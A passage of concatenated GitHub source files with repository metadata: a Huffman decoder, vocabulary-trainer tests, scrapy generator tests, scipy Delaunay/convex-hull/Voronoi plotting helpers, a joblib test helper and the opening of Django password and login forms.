                    fcompressed)
            finally:
                fcompressed.close()
        else:
            # print() form behaves identically on Python 2 (parenthesised
            # expression) and Python 3 (function call).
            print("You haven't set 'long_str' attribute.")
class Decoder(object):
    """Huffman decoder: reads the (pickled tree, bit count, packed bytes)
    triple produced by Encoder.write and reconstructs the original text."""

    def __init__(self, filename_or_raw_str=None):
        # If the argument names an existing file, load from it; otherwise
        # treat the argument itself as the raw marshalled payload.
        if filename_or_raw_str:
            if os.path.exists(filename_or_raw_str):
                filename = filename_or_raw_str
                self.read(filename)
            else:
                print '[Decoder] take \'%s\' as raw string' % filename_or_raw_str
                raw_string = filename_or_raw_str
                unpickled_root, length, array_codes = marshal.loads(raw_string)
                self.root = cPickle.loads(unpickled_root)
                self.code_length = length
                self.array_codes = array.array('B', array_codes)

    def _decode(self):
        """Walk the Huffman tree bit-by-bit and return the decoded string."""
        string_buf = []
        # total_length stops the walk at code_length, ignoring the padding
        # bits in the final byte.
        total_length = 0
        node = self.root
        for code in self.array_codes:
            buf_length = 0
            while (buf_length < MAX_BITS and total_length != self.code_length):
                buf_length += 1
                total_length += 1
                # Test the bits of the byte from most- to least-significant:
                # 1 descends right, 0 descends left; reaching a character
                # node emits it and restarts from the root.
                if code >> (MAX_BITS - buf_length) & 1:
                    node = node.R
                    if node.c:
                        string_buf.append(node.c)
                        node = self.root
                else:
                    node = node.L
                    if node.c:
                        string_buf.append(node.c)
                        node = self.root
        return ''.join(string_buf)

    def read(self, filename):
        """Load the marshalled (tree, bit count, bytes) triple from *filename*."""
        fp = open(filename, 'rb')
        unpickled_root, length, array_codes = marshal.load(fp)
        self.root = cPickle.loads(unpickled_root)
        self.code_length = length
        self.array_codes = array.array('B', array_codes)
        fp.close()

    def decode_as(self, filename):
        """Decode the loaded stream and write the result to *filename*."""
        decoded = self._decode()
        fout = open(filename, 'wb')
        fout.write(decoded)
        fout.close()
if __name__=='__main__':
    # Demo: compress original_file into compressed_file, then restore it
    # into decompressed_file (which should be byte-identical to the input).
    original_file = 'filename.txt'
    compressed_file = 'compressed.scw'
    decompressed_file = 'filename2.txt'
    # first way to use Encoder/Decoder
    enc = Encoder(original_file)
    enc.write(compressed_file)
    dec = Decoder(compressed_file)
    dec.decode_as(decompressed_file)
    # second way
    #enc = Encoder()
    #enc.encode(original_file)
    #enc.write(compressed_file)
    #dec = Decoder()
    #dec.read(compressed_file)
    #dec.decode_as(decompressed_file)
| {
"content_hash": "9d698f9f7d8eb7b0b0cdf90a0bf47fc2",
"timestamp": "",
"source": "github",
"line_count": 206,
"max_line_length": 84,
"avg_line_length": 31.07766990291262,
"alnum_prop": 0.5292096219931272,
"repo_name": "fepe55/RAMB0",
"id": "81437c039dfb3f20319a4b2896ec69b86b1527f8",
"size": "6447",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "python/huffman2.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "10472"
}
],
"symlink_target": ""
} |
import builtins
import os
import tempfile
import unittest
from mock import patch, sentinel # noqa
from pylancard import cli
from pylancard import store
from pylancard import trainer
from pylancard.plugins import base as plugins_base
from pylancard.plugins import cz as lang_cz
class FakeStore(store.Store):
    """Minimal in-memory stand-in for store.Store.

    Deliberately skips Store.__init__ (and therefore any file I/O),
    pre-seeding two word/meaning pairs and base language plugins.
    """

    def __init__(self):
        self.languages = ('1', '2')
        self.direct_index = {
            'word1': 'meaning1',
            'word2': 'meaning2',
        }
        # Mirror of direct_index with keys and values swapped.
        self.reverse_index = {
            meaning: word for word, meaning in self.direct_index.items()
        }
        self.original_plugin = plugins_base.BaseLanguage(self)
        self.meaning_plugin = plugins_base.BaseLanguage(self)
class StoreMixin:
    """Test mixin that provides a fresh FakeStore as ``self.store``."""

    def setUp(self):
        super().setUp()
        self.store = FakeStore()
@patch.object(plugins_base.BaseLanguage, 'convert_word',
              side_effect=lambda x: x)
class TestStore(StoreMixin, unittest.TestCase):
    """Store.add/delete behaviour, with word conversion stubbed to identity.

    Every test receives the class-level convert_word mock as its last
    parameter (injected by @patch.object on the class).
    """

    def test_add(self, convert_mock):
        """add() inserts into both indexes and converts both words."""
        self.store.add('word3', 'meaning3')
        self.assertEqual('meaning3', self.store.direct_index['word3'])
        self.assertEqual('word3', self.store.reverse_index['meaning3'])
        convert_mock.assert_any_call('word3')
        convert_mock.assert_any_call('meaning3')

    def test_add_no_overwrite(self, convert_mock):
        """add() raises KeyError for an existing word and keeps old data."""
        self.assertRaises(KeyError, self.store.add, 'word1', 'meaning3')
        self.assertEqual('meaning1', self.store.direct_index['word1'])
        self.assertEqual('word1', self.store.reverse_index['meaning1'])
        convert_mock.assert_any_call('word1')
        convert_mock.assert_any_call('meaning3')

    def test_add_overwrite(self, convert_mock):
        """may_overwrite=True replaces the existing pair in both indexes."""
        self.store.add('word1', 'meaning3', may_overwrite=True)
        self.assertEqual('meaning3', self.store.direct_index['word1'])
        self.assertEqual('word1', self.store.reverse_index['meaning3'])
        convert_mock.assert_any_call('word1')
        convert_mock.assert_any_call('meaning3')

    def test_delete(self, convert_mock):
        """delete() removes the pair from both indexes."""
        self.store.delete('word1')
        self.assertNotIn('word1', self.store.direct_index)
        self.assertNotIn('meaning1', self.store.reverse_index)
        convert_mock.assert_called_once_with('word1')

    def test_delete_not_found(self, convert_mock):
        """delete() raises KeyError for an unknown word."""
        self.assertRaises(KeyError, self.store.delete, 'word??')
        convert_mock.assert_called_once_with('word??')

    def test_delete_silent(self, convert_mock):
        """silent=True swallows the missing-word error, indexes untouched."""
        orig_direct = self.store.direct_index.copy()
        orig_reverse = self.store.reverse_index.copy()
        self.store.delete('word??', silent=True)
        self.assertEqual(orig_direct, self.store.direct_index)
        self.assertEqual(orig_reverse, self.store.reverse_index)
        convert_mock.assert_called_once_with('word??')
class TestStoreIO(unittest.TestCase):
    """Round-trip tests for store.create / store.Store persistence."""

    def setUp(self):
        super().setUp()
        # BUG FIX: tempfile.mkdtemp() leaked one directory per test run.
        # TemporaryDirectory + addCleanup removes it when the test ends,
        # even if the test fails.
        tmp = tempfile.TemporaryDirectory()
        self.addCleanup(tmp.cleanup)
        self.dir = tmp.name

    def test_create_open(self):
        """create() produces a store that reopens with the requested
        languages, empty indexes and the matching language plugins."""
        filename = os.path.join(self.dir, 'file')
        store.create(filename, ('cz', 'Oo'))
        new_store = store.Store(filename)
        self.assertEqual(('cz', 'Oo'), new_store.languages)
        self.assertEqual({}, new_store.direct_index)
        self.assertEqual({}, new_store.reverse_index)
        self.assertIsInstance(new_store.original_plugin, lang_cz.Czech)
        self.assertIsInstance(new_store.meaning_plugin,
                              plugins_base.BaseLanguage)

    def test_create_open_save(self):
        """Words added inside the context manager are persisted, and the
        reverse index is rebuilt on reopen."""
        filename = os.path.join(self.dir, 'file')
        store.create(filename, ('cz', 'Oo'))
        with store.Store(filename) as new_store:
            new_store.direct_index['word'] = 'meaning'
        new_store = store.Store(filename)
        self.assertEqual({'word': 'meaning'}, new_store.direct_index)
        self.assertEqual({'meaning': 'word'}, new_store.reverse_index)
class TestTrainer(StoreMixin, unittest.TestCase):
    """trainer.Trainer challenge/answer cycle in both directions."""

    def test_unexpected_kind(self):
        # "42" is not a recognised trainer kind.
        self.assertRaises(ValueError, trainer.Trainer, self.store, "42")

    def test_direct_next(self):
        """DIRECT mode draws challenges from the word -> meaning index."""
        tr = trainer.Trainer(self.store, trainer.DIRECT)
        for _ in range(10):
            challenge = tr.next()
            self.assertIn(challenge, self.store.direct_index)
            self.assertEqual(challenge, tr.challenge)
            self.assertEqual(self.store.direct_index[challenge], tr.answer)

    def test_reverse_next(self):
        """REVERSE mode draws challenges from the meaning -> word index."""
        tr = trainer.Trainer(self.store, trainer.REVERSE)
        for _ in range(10):
            challenge = tr.next()
            self.assertIn(challenge, self.store.reverse_index)
            self.assertEqual(challenge, tr.challenge)
            self.assertEqual(self.store.reverse_index[challenge], tr.answer)

    @patch.object(plugins_base.BaseLanguage, 'convert_word')
    def test_check(self, convert_mock):
        """check() accepts the exact answer and rejects anything else;
        both candidate strings go through convert_word first."""
        convert_mock.side_effect = lambda word: word
        tr = trainer.Trainer(self.store, trainer.DIRECT)
        tr.next()
        self.assertTrue(tr.check(tr.answer))
        self.assertFalse(tr.check(tr.answer + 'x'))
        convert_mock.assert_any_call(tr.answer)
        convert_mock.assert_any_call(tr.answer + 'x')
class TestBaseLanguage(unittest.TestCase):
    """BaseLanguage pattern substitution and the `present` flag."""

    def test_convert_word(self):
        # Each occurrence of a pattern key is replaced by its value.
        class Test(plugins_base.BaseLanguage):
            patterns = {'bb': 'BB'}
        self.assertEqual('aBBccBB', Test(None).convert_word('abbccbb'))

    def test_present(self):
        # NOTE(review): `present` is read on an *instance* here but on the
        # *class* below; presumably plugins_base implements it so that any
        # subclass reports present=True -- confirm against plugins_base.
        self.assertFalse(plugins_base.BaseLanguage(None).present)
        desc = type('Test', (plugins_base.BaseLanguage,), {})
        self.assertTrue(desc.present)
@patch.object(store.Store, 'add')
class TestCliAdd(StoreMixin, unittest.TestCase):
    """cli.add parses "word=meaning" arguments into Store.add calls."""

    def test_add_one(self, add_mock):
        cli.add('add', self.store, ['word3=meaning3'])
        add_mock.assert_called_once_with('word3', 'meaning3',
                                         may_overwrite=False)

    def test_add_one_overwrite(self, add_mock):
        # The 'add!' command variant sets may_overwrite=True.
        cli.add('add!', self.store, ['word3=meaning3'])
        add_mock.assert_called_once_with('word3', 'meaning3',
                                         may_overwrite=True)
@patch.object(store.Store, 'delete')
class TestCliDelete(StoreMixin, unittest.TestCase):
    """cli.delete forwards each word to Store.delete and reports failures."""

    def test_delete(self, delete_mock):
        cli.delete('delete', self.store, ['word1'])
        delete_mock.assert_called_once_with('word1')

    def test_delete_multi(self, delete_mock):
        cli.delete('delete', self.store, ['word1', 'word2'])
        for word in ('word1', 'word2'):
            delete_mock.assert_any_call(word)

    @patch.object(builtins, 'print')
    def test_delete_not_found(self, print_mock, delete_mock):
        # A missing word prints an error and stops further deletions.
        delete_mock.side_effect = KeyError
        cli.delete('delete', self.store, ['word??', 'word'])
        print_mock.assert_called_once_with(
            "ERROR: `delete`: word 'word??' was not found")
        delete_mock.assert_called_once_with('word??')
@patch.object(builtins, 'print')
class TestCliList(StoreMixin, unittest.TestCase):
    """cli.list_ prints each word/meaning pair exactly once."""

    def test_list(self, print_mock):
        cli.list_('list', self.store, [])
        for expected in ("word1\tmeaning1", "word2\tmeaning2"):
            print_mock.assert_any_call(expected)
        self.assertEqual(2, print_mock.call_count)
@patch.object(builtins, 'input')
@patch.object(builtins, 'print')
@patch.object(trainer, 'Trainer')
class TestCliTrainer(unittest.TestCase):
    """cli.train REPL loop: prompting, answer checking, /skip and /quit.

    Mocks are injected bottom-up: Trainer, then print, then input.
    An EOFError side effect on input simulates the user closing stdin.
    """

    def test_train(self, trainer_mock, print_mock, input_mock):
        # EOF on the first prompt: exactly one challenge is shown.
        trainer_mock.return_value.next.return_value = 'word'
        input_mock.side_effect = EOFError()
        cli.train('cmd', sentinel.store, [])
        trainer_mock.return_value.next.assert_called_once_with()
        print_mock.assert_any_call("Next word: word")

    def test_correct(self, trainer_mock, print_mock, input_mock):
        # A correct answer advances to the next challenge.
        trainer_mock.return_value.next.side_effect = ['word1', 'word2']
        trainer_mock.return_value.check.return_value = True
        input_mock.side_effect = ['word1', EOFError()]
        cli.train('cmd', sentinel.store, [])
        trainer_mock.return_value.next.assert_called_with()
        self.assertEqual(2, trainer_mock.return_value.next.call_count)
        print_mock.assert_any_call("Next word: word1")
        print_mock.assert_any_call("Next word: word2")

    def test_incorrect(self, trainer_mock, print_mock, input_mock):
        # A wrong answer keeps the same challenge and prints a hint.
        trainer_mock.return_value.next.return_value = 'word'
        trainer_mock.return_value.check.return_value = False
        input_mock.side_effect = ['word1', EOFError()]
        cli.train('cmd', sentinel.store, [])
        trainer_mock.return_value.next.assert_called_once_with()
        print_mock.assert_any_call("Next word: word")
        print_mock.assert_any_call("Wrong, try again")

    def test_skip(self, trainer_mock, print_mock, input_mock):
        # '/skip' advances without checking the answer.
        trainer_mock.return_value.next.side_effect = ['word1', 'word2']
        input_mock.side_effect = ['/skip', EOFError()]
        cli.train('cmd', sentinel.store, [])
        trainer_mock.return_value.next.assert_called_with()
        self.assertEqual(2, trainer_mock.return_value.next.call_count)
        self.assertFalse(trainer_mock.return_value.check.called)
        print_mock.assert_any_call("Next word: word1")
        print_mock.assert_any_call("Next word: word2")

    def test_quit(self, trainer_mock, print_mock, input_mock):
        # '/quit' leaves the loop without checking the answer.
        trainer_mock.return_value.next.return_value = 'word'
        input_mock.return_value = '/quit'
        cli.train('cmd', sentinel.store, [])
        trainer_mock.return_value.next.assert_called_once_with()
        self.assertFalse(trainer_mock.return_value.check.called)
| {
"content_hash": "2a1f3161c7209c8226968f84ca5f3f19",
"timestamp": "",
"source": "github",
"line_count": 246,
"max_line_length": 76,
"avg_line_length": 39.03252032520325,
"alnum_prop": 0.6435117683815872,
"repo_name": "dtantsur/pylancard",
"id": "0df01a3bdd7e4a842da9545a40e7e2c428e63b6f",
"size": "9602",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pylancard/test.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "18267"
}
],
"symlink_target": ""
} |
import unittest
import warnings
from functools import partial
from unittest import mock
from scrapy.utils.misc import is_generator_with_return_value, warn_on_generator_with_return_value
def _indentation_error(*args, **kwargs):
raise IndentationError()
def top_level_return_something():
"""
docstring
"""
url = """
https://example.org
"""
yield url
return 1
def top_level_return_none():
"""
docstring
"""
url = """
https://example.org
"""
yield url
return
def generator_that_returns_stuff():
yield 1
yield 2
return 3
class UtilsMiscPy3TestCase(unittest.TestCase):
def test_generators_return_something(self):
def f1():
yield 1
return 2
def g1():
yield 1
return "asdf"
def h1():
yield 1
def helper():
return 0
yield helper()
return 2
def i1():
"""
docstring
"""
url = """
https://example.org
"""
yield url
return 1
assert is_generator_with_return_value(top_level_return_something)
assert is_generator_with_return_value(f1)
assert is_generator_with_return_value(g1)
assert is_generator_with_return_value(h1)
assert is_generator_with_return_value(i1)
with warnings.catch_warnings(record=True) as w:
warn_on_generator_with_return_value(None, top_level_return_something)
self.assertEqual(len(w), 1)
self.assertIn('The "NoneType.top_level_return_something" method is a generator', str(w[0].message))
with warnings.catch_warnings(record=True) as w:
warn_on_generator_with_return_value(None, f1)
self.assertEqual(len(w), 1)
self.assertIn('The "NoneType.f1" method is a generator', str(w[0].message))
with warnings.catch_warnings(record=True) as w:
warn_on_generator_with_return_value(None, g1)
self.assertEqual(len(w), 1)
self.assertIn('The "NoneType.g1" method is a generator', str(w[0].message))
with warnings.catch_warnings(record=True) as w:
warn_on_generator_with_return_value(None, h1)
self.assertEqual(len(w), 1)
self.assertIn('The "NoneType.h1" method is a generator', str(w[0].message))
with warnings.catch_warnings(record=True) as w:
warn_on_generator_with_return_value(None, i1)
self.assertEqual(len(w), 1)
self.assertIn('The "NoneType.i1" method is a generator', str(w[0].message))
def test_generators_return_none(self):
def f2():
yield 1
return None
def g2():
yield 1
return
def h2():
yield 1
def i2():
yield 1
yield from generator_that_returns_stuff()
def j2():
yield 1
def helper():
return 0
yield helper()
def k2():
"""
docstring
"""
url = """
https://example.org
"""
yield url
return
def l2():
return
assert not is_generator_with_return_value(top_level_return_none)
assert not is_generator_with_return_value(f2)
assert not is_generator_with_return_value(g2)
assert not is_generator_with_return_value(h2)
assert not is_generator_with_return_value(i2)
assert not is_generator_with_return_value(j2) # not recursive
assert not is_generator_with_return_value(k2) # not recursive
assert not is_generator_with_return_value(l2)
with warnings.catch_warnings(record=True) as w:
warn_on_generator_with_return_value(None, top_level_return_none)
self.assertEqual(len(w), 0)
with warnings.catch_warnings(record=True) as w:
warn_on_generator_with_return_value(None, f2)
self.assertEqual(len(w), 0)
with warnings.catch_warnings(record=True) as w:
warn_on_generator_with_return_value(None, g2)
self.assertEqual(len(w), 0)
with warnings.catch_warnings(record=True) as w:
warn_on_generator_with_return_value(None, h2)
self.assertEqual(len(w), 0)
with warnings.catch_warnings(record=True) as w:
warn_on_generator_with_return_value(None, i2)
self.assertEqual(len(w), 0)
with warnings.catch_warnings(record=True) as w:
warn_on_generator_with_return_value(None, j2)
self.assertEqual(len(w), 0)
with warnings.catch_warnings(record=True) as w:
warn_on_generator_with_return_value(None, k2)
self.assertEqual(len(w), 0)
with warnings.catch_warnings(record=True) as w:
warn_on_generator_with_return_value(None, l2)
self.assertEqual(len(w), 0)
def test_generators_return_none_with_decorator(self):
def decorator(func):
def inner_func():
func()
return inner_func
@decorator
def f3():
yield 1
return None
@decorator
def g3():
yield 1
return
@decorator
def h3():
yield 1
@decorator
def i3():
yield 1
yield from generator_that_returns_stuff()
@decorator
def j3():
yield 1
def helper():
return 0
yield helper()
@decorator
def k3():
"""
docstring
"""
url = """
https://example.org
"""
yield url
return
@decorator
def l3():
return
assert not is_generator_with_return_value(top_level_return_none)
assert not is_generator_with_return_value(f3)
assert not is_generator_with_return_value(g3)
assert not is_generator_with_return_value(h3)
assert not is_generator_with_return_value(i3)
assert not is_generator_with_return_value(j3) # not recursive
assert not is_generator_with_return_value(k3) # not recursive
assert not is_generator_with_return_value(l3)
with warnings.catch_warnings(record=True) as w:
warn_on_generator_with_return_value(None, top_level_return_none)
self.assertEqual(len(w), 0)
with warnings.catch_warnings(record=True) as w:
warn_on_generator_with_return_value(None, f3)
self.assertEqual(len(w), 0)
with warnings.catch_warnings(record=True) as w:
warn_on_generator_with_return_value(None, g3)
self.assertEqual(len(w), 0)
with warnings.catch_warnings(record=True) as w:
warn_on_generator_with_return_value(None, h3)
self.assertEqual(len(w), 0)
with warnings.catch_warnings(record=True) as w:
warn_on_generator_with_return_value(None, i3)
self.assertEqual(len(w), 0)
with warnings.catch_warnings(record=True) as w:
warn_on_generator_with_return_value(None, j3)
self.assertEqual(len(w), 0)
with warnings.catch_warnings(record=True) as w:
warn_on_generator_with_return_value(None, k3)
self.assertEqual(len(w), 0)
with warnings.catch_warnings(record=True) as w:
warn_on_generator_with_return_value(None, l3)
self.assertEqual(len(w), 0)
@mock.patch("scrapy.utils.misc.is_generator_with_return_value", new=_indentation_error)
def test_indentation_error(self):
with warnings.catch_warnings(record=True) as w:
warn_on_generator_with_return_value(None, top_level_return_none)
self.assertEqual(len(w), 1)
self.assertIn('Unable to determine', str(w[0].message))
def test_partial(self):
def cb(arg1, arg2):
yield {}
partial_cb = partial(cb, arg1=42)
assert not is_generator_with_return_value(partial_cb)
| {
"content_hash": "10052caf313c960dae9923562d29f99b",
"timestamp": "",
"source": "github",
"line_count": 264,
"max_line_length": 111,
"avg_line_length": 30.852272727272727,
"alnum_prop": 0.5760589318600369,
"repo_name": "scrapy/scrapy",
"id": "562f72fee8bf33dabec0fa1f468d99b8dfd25ccb",
"size": "8145",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tests/test_utils_misc/test_return_with_argument_inside_generator.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "3237"
},
{
"name": "Python",
"bytes": "2021119"
},
{
"name": "Roff",
"bytes": "2010"
},
{
"name": "Shell",
"bytes": "259"
}
],
"symlink_target": ""
} |
import numpy as np
from scipy._lib.decorator import decorator as _decorator
__all__ = ['delaunay_plot_2d', 'convex_hull_plot_2d', 'voronoi_plot_2d']
@_decorator
def _held_figure(func, obj, ax=None, **kw):
    """Decorator for the 2-D plot helpers: supplies a default Axes when
    none is given and preserves matplotlib 1.x's "hold" state around the
    wrapped call."""
    import matplotlib.pyplot as plt  # type: ignore[import]
    if ax is None:
        # No axes supplied: draw on a fresh figure's current axes.
        fig = plt.figure()
        ax = fig.gca()
        return func(obj, ax=ax, **kw)
    # As of matplotlib 2.0, the "hold" mechanism is deprecated.
    # When matplotlib 1.x is no longer supported, this check can be removed.
    was_held = getattr(ax, 'ishold', lambda: True)()
    if was_held:
        return func(obj, ax=ax, **kw)
    try:
        # Temporarily enable hold so the plot call does not clear the axes,
        # then restore the caller's original hold state.
        ax.hold(True)
        return func(obj, ax=ax, **kw)
    finally:
        ax.hold(was_held)
def _adjust_bounds(ax, points):
margin = 0.1 * points.ptp(axis=0)
xy_min = points.min(axis=0) - margin
xy_max = points.max(axis=0) + margin
ax.set_xlim(xy_min[0], xy_max[0])
ax.set_ylim(xy_min[1], xy_max[1])
@_held_figure
def delaunay_plot_2d(tri, ax=None):
    """
    Plot the given Delaunay triangulation in 2-D

    Parameters
    ----------
    tri : scipy.spatial.Delaunay instance
        Triangulation to plot
    ax : matplotlib.axes.Axes instance, optional
        Axes to plot on

    Returns
    -------
    fig : matplotlib.figure.Figure instance
        Figure for the plot

    See Also
    --------
    Delaunay
    matplotlib.pyplot.triplot

    Notes
    -----
    Requires Matplotlib.

    Examples
    --------
    >>> import matplotlib.pyplot as plt
    >>> from scipy.spatial import Delaunay, delaunay_plot_2d

    The Delaunay triangulation of a set of random points:

    >>> points = np.random.rand(30, 2)
    >>> tri = Delaunay(points)

    Plot it:

    >>> _ = delaunay_plot_2d(tri)
    >>> plt.show()

    """
    if tri.points.shape[1] != 2:
        raise ValueError("Delaunay triangulation is not 2-D")
    # Scatter the input points, then draw the triangle edges over them.
    xs, ys = tri.points.T
    ax.plot(xs, ys, 'o')
    ax.triplot(xs, ys, tri.simplices.copy())
    _adjust_bounds(ax, tri.points)
    return ax.figure
@_held_figure
def convex_hull_plot_2d(hull, ax=None):
    """
    Plot the given convex hull diagram in 2-D

    Parameters
    ----------
    hull : scipy.spatial.ConvexHull instance
        Convex hull to plot
    ax : matplotlib.axes.Axes instance, optional
        Axes to plot on

    Returns
    -------
    fig : matplotlib.figure.Figure instance
        Figure for the plot

    See Also
    --------
    ConvexHull

    Notes
    -----
    Requires Matplotlib.

    Examples
    --------
    >>> import matplotlib.pyplot as plt
    >>> from scipy.spatial import ConvexHull, convex_hull_plot_2d

    The convex hull of a random set of points:

    >>> points = np.random.rand(30, 2)
    >>> hull = ConvexHull(points)

    Plot it:

    >>> _ = convex_hull_plot_2d(hull)
    >>> plt.show()

    """
    from matplotlib.collections import LineCollection  # type: ignore[import]
    if hull.points.shape[1] != 2:
        raise ValueError("Convex hull is not 2-D")
    # Scatter the input points, then draw each hull facet as a segment.
    ax.plot(hull.points[:, 0], hull.points[:, 1], 'o')
    segments = [hull.points[simplex] for simplex in hull.simplices]
    collection = LineCollection(segments, colors='k', linestyle='solid')
    ax.add_collection(collection)
    _adjust_bounds(ax, hull.points)
    return ax.figure
@_held_figure
def voronoi_plot_2d(vor, ax=None, **kw):
    """
    Plot the given Voronoi diagram in 2-D

    Parameters
    ----------
    vor : scipy.spatial.Voronoi instance
        Diagram to plot
    ax : matplotlib.axes.Axes instance, optional
        Axes to plot on
    show_points: bool, optional
        Add the Voronoi points to the plot.
    show_vertices : bool, optional
        Add the Voronoi vertices to the plot.
    line_colors : string, optional
        Specifies the line color for polygon boundaries
    line_width : float, optional
        Specifies the line width for polygon boundaries
    line_alpha: float, optional
        Specifies the line alpha for polygon boundaries
    point_size: float, optional
        Specifies the size of points

    Returns
    -------
    fig : matplotlib.figure.Figure instance
        Figure for the plot

    See Also
    --------
    Voronoi

    Notes
    -----
    Requires Matplotlib.

    Examples
    --------
    Set of point:

    >>> import matplotlib.pyplot as plt
    >>> points = np.random.rand(10,2) #random

    Voronoi diagram of the points:

    >>> from scipy.spatial import Voronoi, voronoi_plot_2d
    >>> vor = Voronoi(points)

    using `voronoi_plot_2d` for visualisation:

    >>> fig = voronoi_plot_2d(vor)

    using `voronoi_plot_2d` for visualisation with enhancements:

    >>> fig = voronoi_plot_2d(vor, show_vertices=False, line_colors='orange',
    ...                 line_width=2, line_alpha=0.6, point_size=2)
    >>> plt.show()

    """
    from matplotlib.collections import LineCollection
    if vor.points.shape[1] != 2:
        raise ValueError("Voronoi diagram is not 2-D")
    if kw.get('show_points', True):
        point_size = kw.get('point_size', None)
        ax.plot(vor.points[:,0], vor.points[:,1], '.', markersize=point_size)
    if kw.get('show_vertices', True):
        ax.plot(vor.vertices[:,0], vor.vertices[:,1], 'o')
    line_colors = kw.get('line_colors', 'k')
    line_width = kw.get('line_width', 1.0)
    line_alpha = kw.get('line_alpha', 1.0)
    center = vor.points.mean(axis=0)
    ptp_bound = vor.points.ptp(axis=0)
    finite_segments = []
    infinite_segments = []
    # Each ridge is the Voronoi edge between the two input points in
    # `pointidx`; a vertex index of -1 marks an edge extending to infinity.
    for pointidx, simplex in zip(vor.ridge_points, vor.ridge_vertices):
        simplex = np.asarray(simplex)
        if np.all(simplex >= 0):
            finite_segments.append(vor.vertices[simplex])
        else:
            i = simplex[simplex >= 0][0]  # finite end Voronoi vertex
            t = vor.points[pointidx[1]] - vor.points[pointidx[0]]  # tangent
            t /= np.linalg.norm(t)
            n = np.array([-t[1], t[0]])  # normal
            # Extend the open edge from its finite vertex, away from the
            # point cloud's center, far enough to leave the plot bounds.
            midpoint = vor.points[pointidx].mean(axis=0)
            direction = np.sign(np.dot(midpoint - center, n)) * n
            if (vor.furthest_site):
                direction = -direction
            far_point = vor.vertices[i] + direction * ptp_bound.max()
            infinite_segments.append([vor.vertices[i], far_point])
    # Finite edges are drawn solid; truncated infinite edges dashed.
    ax.add_collection(LineCollection(finite_segments,
                                     colors=line_colors,
                                     lw=line_width,
                                     alpha=line_alpha,
                                     linestyle='solid'))
    ax.add_collection(LineCollection(infinite_segments,
                                     colors=line_colors,
                                     lw=line_width,
                                     alpha=line_alpha,
                                     linestyle='dashed'))
    _adjust_bounds(ax, vor.points)
    return ax.figure
| {
"content_hash": "c429e28a68ffe1099aff03e3ff719f3e",
"timestamp": "",
"source": "github",
"line_count": 262,
"max_line_length": 77,
"avg_line_length": 26.553435114503817,
"alnum_prop": 0.5755354319390542,
"repo_name": "person142/scipy",
"id": "dfdcec86da3daf949fd3a7c80d657fa29a960134",
"size": "6957",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "scipy/spatial/_plotutils.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "4399737"
},
{
"name": "C++",
"bytes": "654192"
},
{
"name": "Dockerfile",
"bytes": "1291"
},
{
"name": "Fortran",
"bytes": "5368529"
},
{
"name": "MATLAB",
"bytes": "4346"
},
{
"name": "Makefile",
"bytes": "778"
},
{
"name": "Python",
"bytes": "12769355"
},
{
"name": "Shell",
"bytes": "538"
},
{
"name": "TeX",
"bytes": "52106"
}
],
"symlink_target": ""
} |
def return_slice_of_data(arr, start_idx, end_idx):
    """Return the half-open slice ``arr[start_idx:end_idx]``."""
    window = slice(start_idx, end_idx)
    return arr[window]
def print_filename_and_raise(arr):
    """Print the filename of the memmap backing *arr*, then raise ValueError.

    Test helper: the caller (typically a parent process) captures stdout to
    learn which file backs the array, and expects the ValueError to propagate.
    """
    from joblib._memmapping_reducer import _get_backing_memmap
    print(_get_backing_memmap(arr).filename)
    raise ValueError
| {
"content_hash": "a7d09f8b39310e5362c827173feb9672",
"timestamp": "",
"source": "github",
"line_count": 8,
"max_line_length": 62,
"avg_line_length": 31.375,
"alnum_prop": 0.7290836653386454,
"repo_name": "ryfeus/lambda-packs",
"id": "20ec8c1ba0a50da6be9fce3686ac1950b1a55ab5",
"size": "251",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "Sklearn_arm/source/joblib/test/testutils.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "9768343"
},
{
"name": "C++",
"bytes": "76566960"
},
{
"name": "CMake",
"bytes": "191097"
},
{
"name": "CSS",
"bytes": "153538"
},
{
"name": "Cuda",
"bytes": "61768"
},
{
"name": "Cython",
"bytes": "3110222"
},
{
"name": "Fortran",
"bytes": "110284"
},
{
"name": "HTML",
"bytes": "248658"
},
{
"name": "JavaScript",
"bytes": "62920"
},
{
"name": "MATLAB",
"bytes": "17384"
},
{
"name": "Makefile",
"bytes": "152150"
},
{
"name": "Python",
"bytes": "549307737"
},
{
"name": "Roff",
"bytes": "26398"
},
{
"name": "SWIG",
"bytes": "142"
},
{
"name": "Shell",
"bytes": "7790"
},
{
"name": "Smarty",
"bytes": "4090"
},
{
"name": "TeX",
"bytes": "152062"
},
{
"name": "XSLT",
"bytes": "305540"
}
],
"symlink_target": ""
} |
from django import forms
from django.conf import settings
from django.contrib.auth.models import User
from django.contrib.auth.forms import SetPasswordForm, PasswordChangeForm, \
AdminPasswordChangeForm as DjagnoAdminPasswordChangeForm, UserCreationForm, \
AuthenticationForm as DjangoAuthenticationForm
from localflavor.pl.forms import PLPESELField
from django.utils.translation import ugettext_lazy as _
from passwords.fields import PasswordField
from localflavor.pl.forms import PLPESELField
from sew_django.profiles.models import Profile
class ValidatingSetPasswordForm(SetPasswordForm):
    """SetPasswordForm whose fields use django-passwords' strength checks."""
    new_password1 = PasswordField(label=_("New password"))
    new_password2 = PasswordField(label=_("New password confirm"))
class ValidatingPasswordChangeForm(PasswordChangeForm):
    """PasswordChangeForm whose fields use django-passwords' strength checks."""
    # NOTE(review): label wording differs from ValidatingSetPasswordForm
    # ("confirmation" vs "confirm") — confirm whether that is intentional.
    new_password1 = PasswordField(label=_("New password"))
    new_password2 = PasswordField(label=_("New password confirmation"))
class AdminPasswordChangeForm(DjagnoAdminPasswordChangeForm):
    """Admin password-change form with strength-validated password fields.

    NOTE(review): the base-class alias 'DjagnoAdminPasswordChangeForm' is a
    typo for 'Django...' defined at the import; renaming it would require
    touching the import line as well.
    """
    password1 = PasswordField(label=_("New password"))
    password2 = PasswordField(label=_("New password confirm"))
class AuthenticationForm(DjangoAuthenticationForm):
    """Login form that accepts either a PESEL number or an email address."""
